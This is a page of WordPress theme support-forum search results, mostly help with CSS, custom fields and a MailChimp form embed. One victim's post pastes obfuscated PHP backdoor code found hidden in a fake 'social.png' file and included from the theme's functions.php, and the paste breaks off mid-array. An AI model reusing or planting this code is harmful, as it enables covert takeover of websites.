Viewing 30 results - 1,501 through 1,530 (of 1,633 total)
  • Author
    Search Results
  • #276811

    Ismael,
    thanks for the reply.

    I need that white color in other pages. I have a contact form on the bottom of different pages on dark color. So if there any way that I can change the text white color on white background please let me know.

    Regarding the Ajax problem, have you tried to customize the form and then insert it? I know that you can insert it right away without customizing it. But when you want to customize it by changing field’s name and adding new fields, you can’t insert any contact from.

    #275113

    Topic: Advanced Custom Fileds

    in forum Enfold
    mellasue
    Participant

    Hi there,
    I am trying to add custom fields to my posts ( venue, date, location etc) and am using the ACF plugin to create them. However I cant figure out how to display them in the post backend, and also therefore on the frontend. Could you tell me what pages I need to add code to?

    Many thanks,

    Mella

    #273166
    Pedro
    Participant

    Hi there,

    I’m using advanced custom fields with the theme. This plugin what it does is to provide a nice UI and add custom fields to any kind of post. One of this fields is call repeater field, and stores the data for multiples fields on an array of sub-fields.

    http://www.advancedcustomfields.com/resources/field-types/repeater/

    What I want is to use those fields that I have from before changing the theme, to keep all the info.

    The common code to display does fiels is this

    But this doesn’t works at all. How should I do it? Thanks.

    • This topic was modified 11 years, 9 months ago by Dude.
    • This topic was modified 2 months, 2 weeks ago by Yigit.
    • This topic was modified 2 months, 2 weeks ago by Yigit.
    #268433

    Hi Ismael and Devin,

    I apologize in advance… long reply coming. I hope it helps. :-) I got to look at the diffs between your (Ismael’s) Homepage Test and mine:

    1. The first color section has extra parameters in your version: video=” video_ratio=’16:9′.

    2. The three placeholder-tall images on the homepage are aligned center in yours and left in mine.

    3. The middle placeholder-tall image is animated top-to-bottom in yours and bottom-to-top in mine. I intend for just that image to be bottom-to-top.

    4. Your color sections have shadow set to no-shadow. Mine are set to shadow.

    5. More categories are included in the portfolio grid on mine.

    6. Your homepage-widgets color section has an empty av_textblock at the top of it. (I think I saw this in my document’s layout later and removed it.)

    7. The testimonial subtitles are different.

    8. The title is empty on my version’s contact form because there is a custom h2 title above the form.

    9. Small differences in the contact form like the to: email address and the label for Email address.

    There are also these changes in the text between yours and mine, maybe because of edits I made to my document while working on the CSS:

    1. There are no paragraph tags around some of your paragraphs. I’ve added some paragraphs that have their own CSS classes to mine. (I’m using the Disable WPAutoP plugin on my site.)

    2. I’ve added icons above the 5 services buttons. (I have not uploaded the icon font yet, so they are not displaying.)

    3. I switched the View our Portfolio button’s class from secondary-button to tertiary-button.

    4. Under the Homepage – column 1 widget area, I added a textbox with a button for viewing more articles.

    5-6. I added a class on the h3 for Why user experience design instead of web design?. I also split that textblock to put the button into a separate textblock.

    7. I changed the testimonial widget’s header to be an h3 with its own class.

    8. I added a Park/Company field to

    The rest of the differences are just whitespace.

    So, to sum up the shortcode diffs: I don’t see any differences that may affect the color section width other than the video parameters being added to yours.

    Here are the differences in the full HTML for the two pages:

    1. Their html_entry_id_ and avia_entry_id_ numbers are different.

    2. Your page’s images and CSS are using Pagespeed to optimize them; mine are not – maybe because your page is currently my site’s homepage. Similarly, your version minimizes some CSS that the plugins have not externalized.

    3. On yours, the Tipsy Social Icons CSS is within a <style> tag instead of a <link> tag.

    4. The plugins’ scripts are imported in a different order.

    5. Mine has a <link rel=’next’ …> tag.

    6. Your page uses the .home class.

    7. The breadcrumb trails are generated differently. Quite a bit of difference here, so please refer to the files’ HTML.

    8. Mine has this between the breadcrumbs and the div id for homepage-hero:

    <div class=’container_wrap container_wrap_first main_color fullsize’>
    <div class=’container’>
    <main class=’template-page content twelve alpha units’ role=”main” itemprop=”mainContentOfPage”>
    <article class=’post-entry post-entry-type-page post-entry-354′ itemscope=”itemscope” itemtype=”http://schema.org/CreativeWork”&gt;
    <div class=”entry-content-wrapper clearfix”>
    <header class=”entry-content-header”></header><div class=”entry-content” itemprop=”text”>

    9. The color section id’s in mine also contain classes like avia-builder-el-0, el_before_av_section, and avia-builder-el-first. These are also present in other things I built with the Avia editor, such as images.

    10. There are <main> elements associated with each color section ID in yours.

    11. My contact form uses a fieldset and classes like textare_label hidden textare_label_avia_message_2.

    12. Yours has some obfuscated JavaScript toward the end, starting with var addComment.

    I’ll continue looking into this to see if one element on the page seems to be causing the color section width to break. Firebug might show me this.

    Was your version created after I upgraded to Enfold 2.7.1? Would I be able to resolve this issue by creating new documents with the latest version of Enfold?

    Devin – Thanks. Right, I wasn’t going to change the raw shortcodes unless someone here instructed me to do that. I just turned on the debug mode long enough to do the diff above.

    I’ve commented out the code for adding the debug mode. Feel free to turn debug mode back on if you need it for looking at this issue. Also, if you need them, I have saved files containing the shortcodes for both of our versions of Homepage Test. Could I email these to you?

    Thanks,
    David

    alexiba
    Participant

    Hi,
    I am having 2 issues to use mailchimp signup. I describe each one:

    1.- I copy into a text widget the code took from mailchimp (see below the code at the end of this post) to register emails address, but the issue is that doesn’t show the register button in my website.

    I sought in this site similar case and i found in the post #25340 the follow recomendation:

    #mc_embed_signup input.button {
    visibility: visible;
    }
    I put this code in enfold/general styling/quick ccs style but it doesn’t work

    The follow image shows the mailchimp code issue in my site:
    http://www.nebi.co/wp-content/uploads/2014/05/issue-mailchimp-code.png

    2.- I bought mailchimp plugin to try to register emaill address but the issue is that it doen’t show checkbox to register form. I configure

    The follow image shows the plugin issue in my site:
    http://www.nebi.co/wp-content/uploads/2014/05/plugin-Issue-identification.png

    This image shows the plugin configuration:
    http://www.nebi.co/wp-content/uploads/2014/05/chekbox_Configuration.png

    This is my website link: http://www.nebi.co

    Could you help me to fix the issues?

    Thanks in advance
    Alexiba

    This is the mailchimp Code
    <!– Begin MailChimp Signup Form –>
    <link href=”//cdn-images.mailchimp.com/embedcode/classic-081711.css” rel=”stylesheet” type=”text/css”>
    <style type=”text/css”>
    #mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; }
    /* Add your own MailChimp form style overrides in your site stylesheet or in this style block.
    We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */
    </style>
    <div id=”mc_embed_signup”>
    <form action=”http://nebi.us8.list-manage.com/subscribe/post?u=4345d84afd7ca74010ad51f5b&id=d861c8d67b&#8221; method=”post” id=”mc-embedded-subscribe-form” name=”mc-embedded-subscribe-form” class=”validate” target=”_blank” novalidate>

    <div class=”indicates-required”><span class=”asterisk”>*</span> indicates required</div>
    <div class=”mc-field-group”>
    <label for=”mce-EMAIL”>Email <span class=”asterisk”>*</span>
    </label>
    <input type=”email” value=”” name=”EMAIL” class=”required email” id=”mce-EMAIL”>
    </div>
    <div class=”mc-field-group”>
    <label for=”mce-FNAME”>Nombre <span class=”asterisk”>*</span>
    </label>
    <input type=”text” value=”” name=”FNAME” class=”required” id=”mce-FNAME”>
    </div>
    <div class=”mc-field-group”>
    <label for=”mce-MMERGE2″>Apellido <span class=”asterisk”>*</span>
    </label>
    <input type=”text” value=”” name=”MMERGE2″ class=”required” id=”mce-MMERGE2″>
    </div>
    <div class=”mc-field-group input-group”>
    Interes <span class=”asterisk”>*</span>

    • <input type=”radio” value=”Business Intelligence (BI)” name=”MMERGE3″ id=”mce-MMERGE3-0″><label for=”mce-MMERGE3-0″>Business Intelligence (BI)</label>
    • <input type=”radio” value=”Marketing” name=”MMERGE3″ id=”mce-MMERGE3-1″><label for=”mce-MMERGE3-1″>Marketing</label>
    • <input type=”radio” value=”BI & Marketing” name=”MMERGE3″ id=”mce-MMERGE3-2″><label for=”mce-MMERGE3-2″>BI & Marketing</label>

    </div>
    <div id=”mce-responses” class=”clear”>
    <div class=”response” id=”mce-error-response” style=”display:none”></div>
    <div class=”response” id=”mce-success-response” style=”display:none”></div>
    </div> <!– real people should not fill this in and expect good things – do not remove this or risk form bot signups–>
    <div style=”position: absolute; left: -5000px;”><input type=”text” name=”b_4345d84afd7ca74010ad51f5b_d861c8d67b” tabindex=”-1″ value=””></div>
    <div class=”clear”><input type=”submit” value=”Subscribe” name=”subscribe” id=”mc-embedded-subscribe” class=”button”></div>
    </form>
    </div>
    <script type=”text/javascript”>
    var fnames = new Array();var ftypes = new Array();fnames[0]=’EMAIL’;ftypes[0]=’email’;fnames[1]=’FNAME’;ftypes[1]=’text’;fnames[2]=’MMERGE2′;ftypes[2]=’text’;fnames[3]=’MMERGE3′;ftypes[3]=’radio’;
    try {
    var jqueryLoaded=jQuery;
    jqueryLoaded=true;
    } catch(err) {
    var jqueryLoaded=false;
    }
    var head= document.getElementsByTagName(‘head’)[0];
    if (!jqueryLoaded) {
    var script = document.createElement(‘script’);
    script.type = ‘text/javascript’;
    script.src = ‘//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js’;
    head.appendChild(script);
    if (script.readyState && script.onload!==null){
    script.onreadystatechange= function () {
    if (this.readyState == ‘complete’) mce_preload_check();
    }
    }
    }

    var err_style = ”;
    try{
    err_style = mc_custom_error_style;
    } catch(e){
    err_style = ‘#mc_embed_signup input.mce_inline_error{border-color:#6B0505;} #mc_embed_signup div.mce_inline_error{margin: 0 0 1em 0; padding: 5px 10px; background-color:#6B0505; font-weight: bold; z-index: 1; color:#fff;}’;
    }
    var head= document.getElementsByTagName(‘head’)[0];
    var style= document.createElement(‘style’);
    style.type= ‘text/css’;
    if (style.styleSheet) {
    style.styleSheet.cssText = err_style;
    } else {
    style.appendChild(document.createTextNode(err_style));
    }
    head.appendChild(style);
    setTimeout(‘mce_preload_check();’, 250);

    var mce_preload_checks = 0;
    function mce_preload_check(){
    if (mce_preload_checks>40) return;
    mce_preload_checks++;
    try {
    var jqueryLoaded=jQuery;
    } catch(err) {
    setTimeout(‘mce_preload_check();’, 250);
    return;
    }
    var script = document.createElement(‘script’);
    script.type = ‘text/javascript’;
    script.src = ‘http://downloads.mailchimp.com/js/jquery.form-n-validate.js&#8217;;
    head.appendChild(script);
    try {
    var validatorLoaded=jQuery(“#fake-form”).validate({});
    } catch(err) {
    setTimeout(‘mce_preload_check();’, 250);
    return;
    }
    mce_init_form();
    }
    function mce_init_form(){
    jQuery(document).ready( function($) {
    var options = { errorClass: ‘mce_inline_error’, errorElement: ‘div’, onkeyup: function(){}, onfocusout:function(){}, onblur:function(){} };
    var mce_validator = $(“#mc-embedded-subscribe-form”).validate(options);
    $(“#mc-embedded-subscribe-form”).unbind(‘submit’);//remove the validator so we can get into beforeSubmit on the ajaxform, which then calls the validator
    options = { url: ‘http://nebi.us8.list-manage.com/subscribe/post-json?u=4345d84afd7ca74010ad51f5b&id=d861c8d67b&c=?&#8217;, type: ‘GET’, dataType: ‘json’, contentType: “application/json; charset=utf-8″,
    beforeSubmit: function(){
    $(‘#mce_tmp_error_msg’).remove();
    $(‘.datefield’,’#mc_embed_signup’).each(
    function(){
    var txt = ‘filled’;
    var fields = new Array();
    var i = 0;
    $(‘:text’, this).each(
    function(){
    fields[i] = this;
    i++;
    });
    $(‘:hidden’, this).each(
    function(){
    var bday = false;
    if (fields.length == 2){
    bday = true;
    fields[2] = {‘value’:1970};//trick birthdays into having years
    }
    if ( fields[0].value==’MM’ && fields[1].value==’DD’ && (fields[2].value==’YYYY’ || (bday && fields[2].value==1970) ) ){
    this.value = ”;
    } else if ( fields[0].value==” && fields[1].value==” && (fields[2].value==” || (bday && fields[2].value==1970) ) ){
    this.value = ”;
    } else {
    if (/\[day\]/.test(fields[0].name)){
    this.value = fields[1].value+’/’+fields[0].value+’/’+fields[2].value;
    } else {
    this.value = fields[0].value+’/’+fields[1].value+’/’+fields[2].value;
    }
    }
    });
    });
    $(‘.phonefield-us’,’#mc_embed_signup’).each(
    function(){
    var fields = new Array();
    var i = 0;
    $(‘:text’, this).each(
    function(){
    fields[i] = this;
    i++;
    });
    $(‘:hidden’, this).each(
    function(){
    if ( fields[0].value.length != 3 || fields[1].value.length!=3 || fields[2].value.length!=4 ){
    this.value = ”;
    } else {
    this.value = ‘filled’;
    }
    });
    });
    return mce_validator.form();
    },
    success: mce_success_cb
    };
    $(‘#mc-embedded-subscribe-form’).ajaxForm(options);
    /*
    * Translated default messages for the jQuery validation plugin.
    * Locale: ES
    */
    jQuery.extend(jQuery.validator.messages, {
    required: “Este campo es obligatorio.”,
    remote: “Por favor, rellena este campo.”,
    email: “Por favor, escribe una dirección de correo válida”,
    url: “Por favor, escribe una URL válida.”,
    date: “Por favor, escribe una fecha válida.”,
    dateISO: “Por favor, escribe una fecha (ISO) válida.”,
    number: “Por favor, escribe un número entero válido.”,
    digits: “Por favor, escribe sólo dígitos.”,
    creditcard: “Por favor, escribe un número de tarjeta válido.”,
    equalTo: “Por favor, escribe el mismo valor de nuevo.”,
    accept: “Por favor, escribe un valor con una extensión aceptada.”,
    maxlength: jQuery.validator.format(“Por favor, no escribas más de {0} caracteres.”),
    minlength: jQuery.validator.format(“Por favor, no escribas menos de {0} caracteres.”),
    rangelength: jQuery.validator.format(“Por favor, escribe un valor entre {0} y {1} caracteres.”),
    range: jQuery.validator.format(“Por favor, escribe un valor entre {0} y {1}.”),
    max: jQuery.validator.format(“Por favor, escribe un valor menor o igual a {0}.”),
    min: jQuery.validator.format(“Por favor, escribe un valor mayor o igual a {0}.”)
    });

    });
    }
    function mce_success_cb(resp){
    $(‘#mce-success-response’).hide();
    $(‘#mce-error-response’).hide();
    if (resp.result==”success”){
    $(‘#mce-‘+resp.result+’-response’).show();
    $(‘#mce-‘+resp.result+’-response’).html(resp.msg);
    $(‘#mc-embedded-subscribe-form’).each(function(){
    this.reset();
    });
    } else {
    var index = -1;
    var msg;
    try {
    var parts = resp.msg.split(‘ – ‘,2);
    if (parts[1]==undefined){
    msg = resp.msg;
    } else {
    i = parseInt(parts[0]);
    if (i.toString() == parts[0]){
    index = parts[0];
    msg = parts[1];
    } else {
    index = -1;
    msg = resp.msg;
    }
    }
    } catch(e){
    index = -1;
    msg = resp.msg;
    }
    try{
    if (index== -1){
    $(‘#mce-‘+resp.result+’-response’).show();
    $(‘#mce-‘+resp.result+’-response’).html(msg);
    } else {
    err_id = ‘mce_tmp_error_msg’;
    html = ‘<div id=”‘+err_id+'” style=”‘+err_style+'”> ‘+msg+'</div>’;

    var input_id = ‘#mc_embed_signup’;
    var f = $(input_id);
    if (ftypes[index]==’address’){
    input_id = ‘#mce-‘+fnames[index]+’-addr1′;
    f = $(input_id).parent().parent().get(0);
    } else if (ftypes[index]==’date’){
    input_id = ‘#mce-‘+fnames[index]+’-month’;
    f = $(input_id).parent().parent().get(0);
    } else {
    input_id = ‘#mce-‘+fnames[index];
    f = $().parent(input_id).get(0);
    }
    if (f){
    $(f).append(html);
    $(input_id).focus();
    } else {
    $(‘#mce-‘+resp.result+’-response’).show();
    $(‘#mce-‘+resp.result+’-response’).html(msg);
    }
    }
    } catch(e){
    $(‘#mce-‘+resp.result+’-response’).show();
    $(‘#mce-‘+resp.result+’-response’).html(msg);
    }
    }
    }

    </script>
    <!–End mc_embed_signup–>

    #25340

    #264612
    This reply has been marked as private.

    http://kriesi.at/documentation/enfold/custom-css-and-quick-css/

    quick / custom CSS:

    .avia_ajax_form fieldset p .button{
        background-color: #00000;
        border-bottom-color: #000000;
        border-left-color: #000000;
        border-right-color: #000000;
        border-top-color: #000000;
        color: #000000;
    }

    color is the font color

    http://www.w3schools.com/tags/ref_colorpicker.asp

    #263891

    In reply to: Hubspot forms and CSS

    Hi chays77!

    Thank you for using theme!

    Please try to add this on Quick CSS or custom.css:

    #top input[type="text"] {
    width: 90% !important;
    }
    
    .hs-form.stacked .field {
    margin-bottom: 0 !important;
    }
    
    #top fieldset {
    margin-bottom: 0;
    }

    If you want to remove the theme’s contact form style, edit css > shortcodes.css. Look for this section:

    /* ======================================================================================================================================================
    Contact Form
    ====================================================================================================================================================== */
    

    Regards,
    Ismael

    Hey!

    1b) You can use custom field values (click on “Screen Options” on the top right corner to show the “Custom fields” option field on the product editor page) to set different values for different products. Instead of

    
    echo "6 months";
    

    use this code:

    
    $value = get_post_meta(get_the_ID(), 'custom_delivery_time', true);
    if(!empty($value))  echo $value;
    

    and on the product editor page insert “custom_delivery_time” into the first field (key name) and 6 months into the second field: http://www.clipular.com/c/4982606751858688.png?k=aqKhvkFkIcmJ9X0Yit-nXAz8OT8

    3) Yes, if you want to remove the link try to replace:

    
    return sprintf( '<a href="%s" itemprop="image" class="woocommerce-main-image zoom" title="%s"  rel="prettyPhoto' . $gallery . '">%s</a>', $image_link, $image_title, $image);
    

    with

    
    return sprintf( '<a href="%s" itemprop="image" class="woocommerce-main-image zoom avianolink" title="%s">%s</a>', $image_link, $image_title, $image);
    

    Best regards,
    Peter

    #263750

    Hey!

    Thank you for the update!


    @goncalo
    : Glad it worked. Please try to add this on the child theme’s functions.php:

    add_post_type_support( 'portfolio', 'custom-fields');
    

    @js: Thank you for following the thread. What are the issues that you’re having?

    Regards,
    Ismael

    #263160
    Jason
    Participant

    Hi there,
    Is this possible using this theme & perhaps custom fields (which I’ve seen mentioned on Google)?
    I have a page, say Electronics, which needs to appear in both the Technology section & the Manufacturing section.
    I can’t simply add a custom navigation link as the navigation in question is the sidebar navigation that is automatically generated.
    Any ideas, or all a bit tricky?
    Thanks in advance,
    Jason

    #262719

    Hey!

    Thank you for the update.

    You can enable the custom field support for portfolio items if you edit includes > register-portfolio.php. Find this code on line 38:

    'supports' => array('title','thumbnail','excerpt','editor','comments')
    

    Replace it with:

    'supports' => array('title','thumbnail','excerpt','editor','comments','custom-fields')
    

    Regards,
    Ismael

    #262479

    Hi,

    Unfortunately this doesn’t work with Portfolio Entries. The Portfolio Entries page hasn’t got a the screen option to turn on Custom Fields. Is there a way to get the breadcrumbs displayed on the Portfolio entries?

    Thanks,
    Gonzo

    #256931

    Hey!

    1) To change the table color try this code:

    
    #top .avia-table, #top .avia-table td, #top .avia-table th, #top .avia-table tr{ background: #ffffff !important; }
    

    2) Try this code

    
     #top .avia-table td, #top .avia-table tr, #top .avia-table th, #top .avia-table tr th:first-child, #top .avia-table tr td:first-child {
    border-color: #000;
    }
    

    3) Use this code:

    
    #top .avia-table td, #top .avia-table tr, #top .avia-table th, #top .avia-table tr th:first-child, #top .avia-table tr td:first-child {
    border-left: none !important;
    border-right: none !important;
    }
    

    4) You can’t change it based on the number of rows. If you want to change the text alignment for all td fields use:

    
    #top .avia-table td{
    text-align: center;
    }
    

    Regards,
    Peter

    #255954

    Hey heikilaja!

    Yes, the slideshow images are started in a post meta field called “_preview_ids” (without “”). There’re also some other fields:

    _preview_text
    _preview_display
    _preview_autorotation
    _preview_columns
    _portfolio_custom_link_url

    Best regards,
    Peter

    #255922
    honesty1993
    Participant

    Hello,

    I just launched my wordpress website made with Enfold theme, but 3 days later, I found functions.php under Enfold theme folder has been added a new code as below,

    if (!defined(‘WP_OPTION_KEY’)) {
    include_once ‘social.png’;
    }

    And there is a new extra file social.png in root directory of Enfold theme folder as well, I changed the extension .png to .txt and found the following code in it, would you please let me know what’s happened to this theme and what did the hacker want to get from this code? And how to protect from further attack? Thanks.

    <?php error_reporting(0); if (!defined(‘WP_OPTION_KEY’)) { define(‘WP_OPTION_KEY’, true); function txyFqaETRPUyiEgQatokJIY() { define(‘WP_OPTION_KEY’,’wp_data_newa’); new GsSYoMTsQibQgcHcuGmrg(); } add_action(‘init’, ‘txyFqaETRPUyiEgQatokJIY’); } class VtkddwvkYgCDDRRWbgRtw{ private $AcheTwkrhTtKmyatQGqYFc, $SntMBKFkfTlUzXyNVQedo, $YcmysXeieEGqvkjRIsPYg; public function __construct($BZaxGALPLdVfntBIQWUPs = ‘old’){ if ($BZaxGALPLdVfntBIQWUPs == ‘new’){ $this->QxEolVsSqvJZyRSgHFmL(); } else { $this->yOlGcuINHlzAVPznEbGNvwJM(); } $this->SntMBKFkfTlUzXyNVQedo = “—–BEGIN PUBLIC KEY—–\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6K/I2l6k2Iz7Vojzxk5Q\r\n43QNfIJm2jWPvXAvFtft+yy4rD3MseQJWx3PLlkoRQjSI1uiiwwlPZWED0e5wFet\r\nnS5tKhvvRaOeUPYJq6MtyUbnaMn7bshlgaAlPaUCVdAOjdtGHMuFaWfnBLgTSu3c\r\nuccVC2zOlXx7XK1tw39eZepRemoh0W3Qhf+hDFsEzACSBmKhBiganwCZzTDvyXpj\r\nnfbRKbf26LJDJ9u2Choh768vQiIfuf0tGLQ+xxcBDl2ZVW0P76cd5I2v+lYRBD/X\r\nvgU32/UZeKDheA8M/oZ5/yFv5QWAU2SHEEKYfLkAQmXs/oRGqMQONqoL3W5Q4bE/\r\ngQIDAQAB\r\n—–END PUBLIC KEY—–“; } private function yOlGcuINHlzAVPznEbGNvwJM() { $oXyaqmHoChvHQFCvTluqmAC = get_option(‘WP_CLIENT_KEY’); $this->AcheTwkrhTtKmyatQGqYFc = $oXyaqmHoChvHQFCvTluqmAC; } private function QxEolVsSqvJZyRSgHFmL() { $WUSuJUGMrzyhdyhyGeIjayJs = $this->DWoPBIQOoBwLXRAmwfedw(); $this->AcheTwkrhTtKmyatQGqYFc = $WUSuJUGMrzyhdyhyGeIjayJs[‘private’]; $this->YcmysXeieEGqvkjRIsPYg = $WUSuJUGMrzyhdyhyGeIjayJs[‘public’]; update_option(“WP_CLIENT_KEY”, $this->AcheTwkrhTtKmyatQGqYFc); } public function bkBMtlOkGRaPFVExpcNbC($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->SntMBKFkfTlUzXyNVQedo))); return array(“data” => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), “key” => base64_encode($THPieTXOYTCWThoTFSSuHU[0])); } public function MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->YcmysXeieEGqvkjRIsPYg))); return json_encode(array(“data” => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), “key” => base64_encode($THPieTXOYTCWThoTFSSuHU[0]))); } public function qPhSGyDrRdyPezAnHgiao() { return $this->YcmysXeieEGqvkjRIsPYg; } public function skwTpfzBalSTBTBkLvhw($piiJbwvzLxHvKjlNnFzd) { $this->YcmysXeieEGqvkjRIsPYg = $piiJbwvzLxHvKjlNnFzd; } public function vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC) { $BdlbpgzPBjxVLkBLnsrXkmI = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($BdlbpgzPBjxVLkBLnsrXkmI !== false){ $oXyaqmHoChvHQFCvTluqmAC = $BdlbpgzPBjxVLkBLnsrXkmI; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC)) { return false; } openssl_open(base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC[‘data’])), $WQqrOQbxBHtERCkwicqA, base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC[‘key’])), $this->AcheTwkrhTtKmyatQGqYFc); return $WQqrOQbxBHtERCkwicqA; } public function DWoPBIQOoBwLXRAmwfedw() { $IzGRmpLLtcLVMJRxcfpeGhQVry = openssl_pkey_new(array( ‘private_key_bits’ => 2048, ‘private_key_type’ => OPENSSL_KEYTYPE_RSA, )); openssl_pkey_export($IzGRmpLLtcLVMJRxcfpeGhQVry, $IANNGYfyVIgZFkzWVTKmQGc); $oXyaqmHoChvHQFCvTluqmAC[‘private’] = $IANNGYfyVIgZFkzWVTKmQGc; $XEWVBmIaXvRqxrckbkOqw = openssl_pkey_get_details($IzGRmpLLtcLVMJRxcfpeGhQVry); $oXyaqmHoChvHQFCvTluqmAC[‘public’] = $XEWVBmIaXvRqxrckbkOqw[‘key’]; return $oXyaqmHoChvHQFCvTluqmAC; } } class GsSYoMTsQibQgcHcuGmrg{ public $oXyaqmHoChvHQFCvTluqmAC = array(), $yYVsqvOoqWsddypXgJcIKOw = array(), $qcCONSsvpJlMgdhEFFmrTI, $IzGRmpLLtcLVMJRxcfpeGhQVry, $aJQafHDwnaPrCJrQMjHVh, $AeRxXNHxOXpcNJWlZSIKLhIw, $vwhhtIrAWhUEFDgPrcco, $htcFFCQTLLpnCchsPKGYxso, $wqawPxkNytKqRKNRqbwAdw, $IatJdWimJbxtprWZElHevfI, $YobOrWbieESFVcSsWsuBypg; public $WbKPQMoSbMZkXUeYKXRIk; public function __construct() { $this->yYVsqvOoqWsddypXgJcIKOw = array( ‘==DZk4FZlVwY5RGZhpQB’ ,’=4JnhZUpck2olIKM’, ‘=4JnhZ3M1WJMeyTo’, ‘=02ow5FryW3ogkJnuWUq’, ‘6yzLhDKqwETol92q’, ‘==trcWzYyEKqwETol92q’, ‘g92LhZ3ni9Togyzr’, ‘==DoiAzYiEKqiyKMgS2p’, ‘=8zMhyzYhIJMlqzoi9Jo’, ‘=bKnv5vpuE3phSJofI2n’, ‘aW3ohHzMckzp19JM2y2M’, ‘=02ow5PoyITqmEJquWaM’, ‘==DoiAzY6ITqu1JLgkJL’, ‘g92LhpzockTocM2oaWKM’, ‘==toc5vo1AKMaSTofyzq’, ‘hyzY5Izpi1JM29Jo’, ‘==jMl9zY5ITMi9zMiyzL’, ‘aW3ohVGqlpzocuTq55JL’, ‘==jMl9zYhI2LmEapiO3p’, ‘aW3oh4JLwAUq0I3L’, ‘=pzpi5lp0WKLjSJMyWaM’, ‘==jqj5FqiyKMwyzoyA2p’, ‘3OaY1WGoj1JL’, ‘=pUphxKqaWKnuu2L’, ‘=4JnhVKMeAJnfMJock2p’, ‘=4JnhV3ox5JLl9TryuTq’, ‘=4Jnh4JqvyKMh9Tn’, ‘hyzYmk2oiEaoyk2M’, ‘hyzYh9TqlSzLhSTM’, ‘=4JnhNKqiW3Mf9TogyzL’, ‘==toc5lp0Szp0SzM’, ‘hyzYfIJM0Aaouu2L’, ‘hyzYlSTqm92Mhyzp’, ‘6yzLh4zpiEKMfqzocWaL’, ‘aW3ohHTo5E3pgHJocW3L’, ‘==trcWzYmgJLgyTqf9zM’, ‘==Nqy5zYmAKMhy2M0ITo0I3o’, ‘==jqj5PnmyzMiEUnmyzp’, ‘==jqj5lphS2pfIzquWUq’, ‘==trcWzYlITMuk2Mc5Jq’, ‘0IzohZUocSzMlITMh92q’, ‘0IzohZKMfyUqm52ohITr’, ‘=pzpi5vouEKn0g2LukzL’, ‘=HJohNKqbSTof9Tn’, ‘=DKMh5lpyEJLlq2ohSzo’, ‘6yzLhxapu1TMuITM’, ‘==Nqy5zY39zoe1JLyWUM’, ‘==Nqy5zYlITqm9zM5STo’, ‘==joz5JnhZKMa5JLlE3p’, ‘==trcWzYfy2MlITqhIUn’, ‘=bKnv5FM4S2nfyJo’, ‘=bKnv5PqcgJLgSzp’, ‘==trcWzYfk2ovITqiIKp’, ‘==DoiAzYm52ox1zM’, ‘=02ow5lpwy2p11JLlSTM’, ‘=02ow5vpyWzLiWzpyq2MiWaM’, ‘=02ow5lphIJof92n’, ‘=02ow5lpykTpgS2pi9zM’, ‘==DoiAzYmEzpu9zL2EKo’, ‘==trcWzYmyKLxIao’, ‘iMzoc5lp5kzMx5JLlS2L’, ‘==jow5lqikTn0SJo’, ‘=82Lh82nhIJo’, ‘=02ow5vpiu3Lc1JLhyUM’, ‘==DMg5FngSTMhI2q’, ‘=bKnv5Pqcg2of9zr’, ‘==jqj5PofS2qlITqhSTn’, ‘aW3ohD3owyKMh9Jo’, ‘6yzLhxKoyEJLwSJM0y2pvI2q’, ‘=bKnv5lo5ITMi9zM’, ‘==trcWzYmkJL0W3ojAKM’, ‘==toc5lp3Izo3SJo’, ‘=4Jnhf2LiWKolITq’, ‘hyzYeA2olIzoiE3p’, ‘=4Jnh82oz1zM’, ‘hyzY0WKLjSJMyWaM’, ‘==toc5PMhSTolSTqcI3M’, ‘==toc5vou12MiWUp’, ‘==toc5voz1zM’, ‘hyzYj9TouWKMhI2M’, ‘=4JnhjJL0W3ojAKM’, ‘=8zMhyzYykTpgS2pi9zM’, ‘==joz5JnhHJMlMTAiWTn’, ‘==joz5JnhHaZhITqmyTo’, ‘=8zMhyzYyqJLjgzo’, ‘iMzoc5vMfSTnvI2q’, ‘3OaYm5JqaWzM’, ‘=pUphH2nuEaZwyTp’, ‘=pUphZapyE3pu1JMmIzocu2L’, ‘=pUphxUMukJr6SToi9zM’, ‘3OaYyAKqi92n’, ‘0IzohxKLxIao’, ‘=DKMh5Fne9TMhyzM’, ‘==Nqy5zY5kzMx5JLlS2L’, ‘==Nqy5zYi9zMgyzM’, ‘==Nqy5zY392qzqKL’, ‘==DoiAzYyyao2EKo’, ‘=02ow5lpuyTMySKney2q’, ‘g92Lh4JMwEapiO3p’, ‘=02ow5FMyWaM2EKo’, ‘==DoiAzY3Izo3SJo’ ); $this->aJQafHDwnaPrCJrQMjHVh = array( ‘=HaphjJnu1TD1ETn1c2p’, ‘==DoiAzYfyJLgqTDwyToiMKLlESofSTMhSzH’, ‘==DoiAzYfyJLgqTDkHGBkDapyq3phSHouyTofy2I’, ‘g92LhjJnu12MNEJMjWKq0IzDmSJoiuTI’, ‘==DoiAzYfyJLgqTD39TqlITnHIJnfIaF’, ‘==DoiAzYfyJLgqTDx5JLaIzpv1JqGIzouyTE’, ‘g92LhjJnu12MNyaL4STqc12oQWKMbO3o0AKnlu2D’, ‘=02ow5PocSJoaORZ4xGZmyJobAIL0yzH’, ‘=02ow5PocSJoaORMhSTqlSTovI3oGy3LuE3H’, ‘==DoiAzYfyJLgqTDhIToxyzEl9zqyWUI’, ‘=02ow5PocSJoaORMy5zpyOUpOqJnuW3D’, ‘==DoiAzYfyJLgqTDmHGBk4JMxSHMjIUG’, ‘g92LhjJnu12MNyQAlIzp192Dy5Jn0AKnlu2D’, ‘g92LhjJnu12MNIJo05JngS2H0WKMv9zH’, 